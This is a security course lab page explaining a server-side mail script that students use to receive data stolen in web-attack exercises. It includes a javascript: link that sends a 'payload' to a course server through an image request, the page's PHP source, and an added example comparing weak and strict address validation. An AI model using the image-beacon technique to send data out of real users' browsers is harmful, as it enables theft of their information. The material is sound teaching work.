Lab 3 Email Script

You can use this server-side script to send automated emails from client-side JavaScript. For example, clicking this client-side hyperlink will cause an email to be sent by our web server (pdos.csail.mit.edu). Another copy of the email always goes to 6.893-sendmail@pdos.csail.mit.edu so that we can monitor abuse and you can receive credit for your work. (Don't worry about spamming our account while you test out your exploits; we will ignore mail to that address until we actually grade your submissions.)

javascript:void((new Image()).src='http://pdos.csail.mit.edu/6.893/2009/labs/lab3/sendmail.php?' + 'to=youremailhere@mit.edu' + '&payload=xyz' + '&random=' + Math.random());

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. The void(...); construct prevents the browser from navigating to a new page consisting of the contents of the expression (which is what it normally does when it encounters a non-void expression like javascript:2+2).

Test form

If you just want to try out the script, you can use this form. (For the programming project, you'll probably want to use the JavaScript image technique shown above.)

To: (@mit.edu e-mail address)
Payload: (the information you stole)

This script from last year has been disabled.

Source code

In case you are curious, here is the source code of this page.

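<?php
  // Defaults shown in the example link and the test form.
  // !empty() keeps the same truthiness test without an undefined-index notice.
  $to = !empty($_GET['to']) ? $_GET['to'] : "youremailhere@mit.edu";
  $payload = !empty($_GET['payload']) ? $_GET['payload'] : "xyz";
?>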
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<link rel="stylesheet" type="text/css" href="../labs.css" />
<title>Lab 3 Email Script</title>
</head>

<body>
<h1>Lab 3 Email Script</h1>
<p>You can use this server-side script to send automated
emails from client-side JavaScript. For example, clicking this
client-side hyperlink will cause an email to be sent by our 
web server (pdos.csail.mit.edu). Another copy of the email
always goes to 6.893-sendmail@pdos.csail.mit.edu so that we
can monitor abuse and you can receive credit for your work.
(Don't worry about spamming our account while you test out
your exploits; we will ignore mail to that address until
we actually grade your submissions.)
</p>
    <blockquote><pre class="tty"><?php 
    $link = "javascript:void((new" .
            " Image()).src=" . 
            "'http://pdos.csail.mit.edu/6.893/2009/labs/lab3/sendmail.php?'" . 
            " + 'to=$to'" .
            " + '&payload=$payload' + '&random='" . 
            " + Math.random());";
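    // $to and $payload come from the query string: HTML-escape the link
    // before writing it into the href attribute and the link text.
    $safe = htmlspecialchars($link, ENT_QUOTES);
    echo "<a href=\"$safe\">$safe</a>";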
    ?></pre></blockquote>
    <p>The random argument is ignored, but ensures that the browser 
bypasses its cache when downloading the image. We suggest that you use 
the random argument in your scripts as well. Newlines are not allowed 
in <tt>javascript:</tt> links; if this bothers you, try 

<a href="http://scriptasylum.com/tutorials/encdec/encode-decode.html">URL encoding</a>.
The <code>void(...);</code> construct prevents the browser from 
navigating to a new page consisting of the contents
of the expression (which is what it normally does when it encounters a 
non-void expression like <code><a href="javascript:2+2">javascript:2+2</a></code>). </p>
<h2>Test form</h2>
<p>If you just want to try out the script, you can use this form.
      (For the programming project, you'll probably
want to use the JavaScript image technique shown above.)</p>
<form method="get">
<div>
<b>To:</b> 
<input name="to" value="<?php echo htmlspecialchars($to, ENT_QUOTES); ?>" size="40" /> <i>(@mit.edu e-mail address)</i>
</div>
<div>
</div>
<div>
<b>Payload:</b>
<input name="payload" value="<?php echo htmlspecialchars($payload, ENT_QUOTES); ?>" size="40" />
<i>(the information you stole)</i>
</div>
<div>
<input type="submit" value="Send Email" name="send_submit" />

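<h1>This script from last year has been disabled.</h1>
<?php
  // Disabled: the leading 0 short-circuits the whole handler.
  if(0 && $_REQUEST['to']) {
    // Escape the dot and anchor with \z so only values ending in exactly
    // "@mit.edu" pass ("$" would also accept a trailing newline).
    if(!preg_match('/@mit\.edu\z/i', $_REQUEST['to'])) {
      echo "Please use an @mit.edu e-mail address";
    } else {
      // The course account always receives a copy.
      $to = "6.893-sendmail@pdos.csail.mit.edu";
      // The submitted address is added unless the request comes from the lab grader.
      if (!preg_match("/Lab Grader/i", $_SERVER['HTTP_USER_AGENT']))
        $to .= ", "  . $_REQUEST['to'];
      $subject = "Message from " . $_REQUEST['to'];
      $message = "Payload:\n\n$payload";
      mail($to, $subject, $message);
      echo "<em>Sent!</em>";
    }
  }
?>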
</div>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre>
</form>
</body>
</html>
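
The recipient check in the handler above is a single pattern match on the end of the to parameter. The following is an added example, not part of the course's code, that runs that original pattern beside a stricter check on a few constructed inputs; strict_check() and the sample addresses are assumptions made for illustration.

```php
<?php
// Original pattern from the page: '.' is a wildcard, and '$' also matches
// just before a trailing newline.
function weak_check(string $to): bool {
    return preg_match("/@mit.edu$/i", $to) === 1;
}

// Stricter check (one possible design, hypothetical helper):
//  - reject control characters anywhere in the value
//  - require exactly one syntactically valid address
//  - compare the domain as a literal string, case-insensitively
function strict_check(string $to): bool {
    if (preg_match('/[\x00-\x1F\x7F]/', $to)) {
        return false;
    }
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $domain = substr($to, strrpos($to, '@') + 1);
    return strcasecmp($domain, 'mit.edu') === 0;
}

// Constructed sample inputs (not taken from the page).
$samples = [
    "alice@mit.edu",
    "alice@MIT.EDU",
    "alice@mitxedu",                   // dot position filled by another character
    "alice@example.com, bob@mit.edu",  // list: only the tail is anchored
    "alice@mit.edu\n",                 // trailing newline
    "alice@example.com",
];

foreach ($samples as $s) {
    printf("%-36s weak=%-5s strict=%s\n",
        json_encode($s),
        var_export(weak_check($s), true),
        var_export(strict_check($s), true));
}
```

Run it with the PHP command-line interpreter (PHP 7 or later); each row shows one input and the verdict of both checks.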